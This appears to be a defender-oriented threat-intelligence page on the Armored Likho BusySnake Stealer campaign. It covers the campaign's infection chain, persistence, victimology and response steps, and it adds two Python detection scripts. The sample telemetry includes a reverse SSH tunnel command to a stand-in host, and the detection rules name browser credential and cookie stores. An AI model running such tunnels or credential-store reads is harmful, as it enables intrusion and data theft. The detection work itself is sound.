Armored Likho BusySnake campaign
Summary
Kaspersky reported an active Armored Likho campaign on July 3, 2026 that uses spear-phishing archives, loaders whose source code appears LLM-generated, GitHub-hosted staging, deployment of a Python runtime, and the newly documented BusySnake Stealer against government and electric-power-sector targets in Russia, Kazakhstan, and Brazil.
Tags
- ops
- operations
- APT
- spear phishing
- Windows malware
- infostealer
- Python malware
- PyArmor
- LNK
- PowerShell
- GitHub abuse
- scheduled task persistence
- browser credential theft
- cookie theft
- reverse SSH tunneling
- government targeting
- electric power sector
- Armored Likho
- Eagle Werewolf
- BusySnake Stealer
Campaign flow
- Spear phishing: targets receive archives with themes such as psychological tests, humanitarian aid applications, government notices, social programs, or debt-clearance certificates.
- First stage: archives contain either an NSIS executable or an LNK file. The LNK variant uses the command-line hiding technique associated with ZDI-CAN-25373 and launches a rundll32.exe / PowerShell download chain.
- Decoy: victims see a survey application or a decoy DOCX while staging continues.
- Payload retrieval: loaders fetch Python 3.12, get-pip.py, PyArmor runtime material, data.zip, and module.pyw; Kaspersky notes GitHub repository and release abuse for staging and rotation.
- Persistence: the malware builds %APPDATA%\WindowsHelper, creates VBScript helpers, and registers a scheduled task to run BusySnake repeatedly.
- Collection and C2: BusySnake steals browser credentials and cookies, collects screenshots, clipboard contents, documents, and key-like strings, polls for tasks, and can establish reverse SSH tunnels.
What is durable
- Armored Likho is moving from standalone tunneling tools toward embedding reverse SSH control directly in the stealer.
- Kaspersky says the first-stage payload source included verbose comments and emoji-style formatting that strongly suggest LLM-generated code, complicating attribution and loader-signature stability.
- BusySnake's handler architecture and C2 status model overlap with Armored Likho's AquilaRAT tooling, supporting Kaspersky's medium-confidence attribution.
- The newer BusySnake version moved scheduled-task creation into the Schedule.Service COM object via win32com.client, a quieter persistence implementation than direct schtasks command lines.
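A defender-side audit of exported task definitions, covering both the scheduled-task persistence step in the campaign flow and the COM-based variant noted here. This is an added example, not code from Kaspersky or from the report: it parses Task Scheduler XML (the same object model Schedule.Service exposes) and flags tasks whose action launches a Python interpreter or VBScript helper from a user-writable path, recording the repetition interval and a helper/update-style task name as supporting context. The sample task XML is constructed and modelled on the artifact names in the report; the pattern lists are this example's own assumptions.

```python
from __future__ import annotations

import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Task Scheduler's XML schema namespace, as used by exported task definitions
# and by the Schedule.Service COM interface.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Heuristics built from the artifacts the report names (%APPDATA%\WindowsHelper,
# run.vbs, module.pyw, a repeating task). The patterns are this example's choices.
USER_WRITABLE = re.compile(r"%(APPDATA|LOCALAPPDATA|TEMP)%|\\Users\\[^\\]+\\AppData\\", re.I)
PYTHON_EXEC = re.compile(r"\bpythonw?[\d.]*\.exe\b|\.pyw?\b", re.I)
SCRIPT_HOST = re.compile(r"\b[wc]script\.exe\b|\.vbs\b", re.I)
HELPER_NAME = re.compile(r"windows\s*helper|update", re.I)


@dataclass
class Finding:
    task_name: str
    reasons: list[str] = field(default_factory=list)   # primary indicators
    context: list[str] = field(default_factory=list)   # supporting detail

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def audit_task_xml(task_name: str, xml_doc: str | bytes) -> Finding:
    """Flag a task whose <Exec> action points at user-writable Python or VBScript.

    Pass real exports as bytes: they carry a UTF-16 declaration that ElementTree
    only honours when it sees the raw encoded document.
    """
    root = ET.fromstring(xml_doc)
    finding = Finding(task_name)
    for exec_node in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        command = (exec_node.findtext("t:Command", "", TASK_NS) or "").strip()
        arguments = (exec_node.findtext("t:Arguments", "", TASK_NS) or "").strip()
        cmdline = f"{command} {arguments}".strip()
        if USER_WRITABLE.search(cmdline):
            finding.reasons.append(f"action runs from a user-writable path: {cmdline}")
        if PYTHON_EXEC.search(cmdline):
            finding.reasons.append("action launches a Python interpreter or .py/.pyw script")
        if SCRIPT_HOST.search(cmdline):
            finding.reasons.append("action launches a VBScript helper")
    if finding.suspicious:
        # Context only matters once a primary indicator fired; many benign tasks repeat.
        for interval in root.iterfind(".//t:Repetition/t:Interval", TASK_NS):
            finding.context.append(f"repeats every {interval.text}")
        if HELPER_NAME.search(task_name):
            finding.context.append("generic helper/update-style task name")
    return finding


# Constructed sample: a task shaped like the persistence described in the report.
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT10M</Interval></Repetition>
      <StartBoundary>2026-01-01T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>//B "%APPDATA%\WindowsHelper\run.vbs"</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Constructed sample: a system binary under %SystemRoot%, which the rules must not flag.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2026-01-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>%SystemRoot%\System32\wsqmcons.exe</Command></Exec>
  </Actions>
</Task>
"""

if __name__ == "__main__":
    for name, doc in (("WindowsHelper Update", SUSPICIOUS_TASK_XML), ("Consolidator", BENIGN_TASK_XML)):
        result = audit_task_xml(name, doc)
        print(name, "SUSPICIOUS" if result.suspicious else "ok", result.reasons, result.context)
```

Task definitions can be exported for this audit with `schtasks /Query /TN <name> /XML` or PowerShell's `Get-ScheduledTask | Export-ScheduledTask`; tasks created through Schedule.Service produce the same XML as those created with schtasks, which is what makes the COM variant visible to this check.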
Victimology
Kaspersky reports confirmed victims in:
- Russia
- Kazakhstan
- Brazil
Primary sectors called out publicly:
- government agencies
- electric power infrastructure
Defender response
- Treat a confirmed BusySnake infection as credential compromise. Rotate browser-stored credentials, session cookies, source-control tokens, cloud credentials, VPN credentials, and any secrets stored in user documents or files with long hexadecimal keys.
- Scope for %APPDATA%\WindowsHelper, module.pyw, run.vbs, wh_selfdelete.vbs, Python 3.12 sideload bundles, PyArmor runtime artifacts, and scheduled tasks named like Windows helper or update components.
- Hunt for LNK-to-rundll32.exe-to-PowerShell chains, NSIS droppers launching pnx.exe, and user-writable Python processes that read Chromium Login State / Login Data, Firefox logins.json / key4.db, or browser cookie stores.
- Block or investigate outbound traffic to the public C2 names and IPs published by Kaspersky, including grked[.]online, winupdate[.]live, arvax[.]xyz, 159.198.32[.]222, and related infrastructure.
- Detect reverse SSH usage with -R 0.0.0.0:<port>, disabled host-key checking, and keys supplied at runtime from untrusted infrastructure.
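The hunts in this section as detection logic, added here as an example and not taken from the report or from Kaspersky. The code runs four rules over a batch of constructed process-creation and file-read records in a generic EDR-like shape (pid, ppid, image, cmdline, path): the rundll32.exe-to-PowerShell lineage an LNK launch leaves behind, pnx.exe launched by a dropper, a Python interpreter running from a user-writable path reading a browser credential or cookie store, and an ssh command line combining a 0.0.0.0 remote forward, disabled host-key checking, and an identity file from a user-writable location. The telemetry schema, every sample value, and the browser-store file list are this example's assumptions.

```python
import re
from collections import defaultdict

# Constructed sample telemetry modelled on the chain described in the report.
# Pids, user names, paths and the 203.0.113.10 address (TEST-NET-3) are invented.
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # An LNK file is not a process; telemetry records rundll32.exe under explorer.exe
    # with PowerShell as its child.
    {"type": "process", "pid": 200, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe <arguments elided in this sample>"},
    {"type": "process", "pid": 210, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe <arguments elided in this sample>"},
    {"type": "process", "pid": 300, "ppid": 100, "image": r"C:\Users\jdoe\Downloads\survey.exe",
     "cmdline": "survey.exe"},
    {"type": "process", "pid": 310, "ppid": 300,
     "image": r"C:\Users\jdoe\AppData\Local\Temp\nsz1A2B.tmp\pnx.exe", "cmdline": "pnx.exe"},
    {"type": "process", "pid": 500, "ppid": 1,
     "image": r"C:\Users\jdoe\AppData\Roaming\WindowsHelper\python\pythonw.exe",
     "cmdline": r'pythonw.exe "%APPDATA%\WindowsHelper\module.pyw"'},
    {"type": "file_read", "pid": 500,
     "path": r"C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "process", "pid": 510, "ppid": 500, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r"ssh.exe -N -R 0.0.0.0:2222:localhost:22 -o StrictHostKeyChecking=no "
                r"-i C:\Users\jdoe\AppData\Roaming\WindowsHelper\id_rsa tunnel@203.0.113.10"},
    # Benign activity that the rules must not flag.
    {"type": "process", "pid": 700, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Date"},
    {"type": "process", "pid": 800, "ppid": 100, "image": r"C:\Program Files\Python312\python.exe",
     "cmdline": "python.exe report.py"},
    {"type": "file_read", "pid": 800, "path": r"C:\Users\jdoe\Documents\report.csv"},
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads)\\|%(APPDATA|LOCALAPPDATA|TEMP)%", re.I)
PYTHON_IMAGE = re.compile(r"\\pythonw?[\d.]*\.exe$", re.I)
# Credential and cookie stores named in the report, plus Chromium's "Local State" key file.
BROWSER_STORES = {"login data", "local state", "logins.json", "key4.db", "cookies", "cookies.sqlite"}
REVERSE_BIND = re.compile(r"-R\s*0\.0\.0\.0:\d+")   # case-sensitive: -R is the remote forward flag
HOSTKEY_OFF = re.compile(r"StrictHostKeyChecking[=\s]+no|UserKnownHostsFile[=\s]+/dev/null", re.I)
IDENTITY_FILE = re.compile(r"-i\s+(\S+)")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events: list[dict]) -> list[dict]:
    """Apply the four hunting rules to a batch of events; returns one finding per hit."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    children = defaultdict(list)
    for p in procs.values():
        children[p["ppid"]].append(p)
    findings = []
    for p in procs.values():
        name = basename(p["image"])
        if name == "rundll32.exe":                       # rule 1: LNK -> rundll32 -> PowerShell
            for child in children[p["pid"]]:
                if basename(child["image"]) in ("powershell.exe", "pwsh.exe"):
                    findings.append({"rule": "lnk_rundll32_powershell_chain", "pid": child["pid"],
                                     "detail": f"rundll32.exe pid {p['pid']} spawned {child['cmdline']}"})
        if name == "pnx.exe":                            # rule 2: dropper launching pnx.exe
            parent = procs.get(p["ppid"])
            findings.append({"rule": "nsis_pnx_launch", "pid": p["pid"],
                             "detail": f"parent {parent['image'] if parent else 'unknown'}"})
        if name in ("ssh.exe", "ssh"):                   # rule 4: reverse SSH tunnel
            cmd, hits = p["cmdline"], []
            if REVERSE_BIND.search(cmd):
                hits.append("remote forward bound to 0.0.0.0")
            if HOSTKEY_OFF.search(cmd):
                hits.append("host-key checking disabled")
            key = IDENTITY_FILE.search(cmd)
            if key and USER_WRITABLE.search(key.group(1)):
                hits.append("identity key loaded from a user-writable path")
            if hits:
                findings.append({"rule": "reverse_ssh_tunnel", "pid": p["pid"], "detail": "; ".join(hits)})
    for e in events:                                     # rule 3: user-writable Python reading browser stores
        if e["type"] != "file_read":
            continue
        p = procs.get(e["pid"])
        if (p and PYTHON_IMAGE.search(p["image"]) and USER_WRITABLE.search(p["image"])
                and basename(e["path"]) in BROWSER_STORES):
            findings.append({"rule": "userland_python_reads_browser_store", "pid": p["pid"],
                             "detail": f"{p['image']} read {e['path']}"})
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"[{f['rule']}] pid {f['pid']}: {f['detail']}")
```

Map your EDR's process and file-access fields onto the pid/ppid/image/cmdline/path shape before calling hunt(). Rule 1 depends on parent-child lineage, so it needs a source with reliable ppid values; the ssh rule reports each weak setting separately so a single hit (for example a 0.0.0.0 bind on its own) can be triaged at lower priority than all three together.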
Sources
- Kaspersky Securelist: https://securelist.com/tr/armored-likho-apt-with-busysnake-stealer/120292/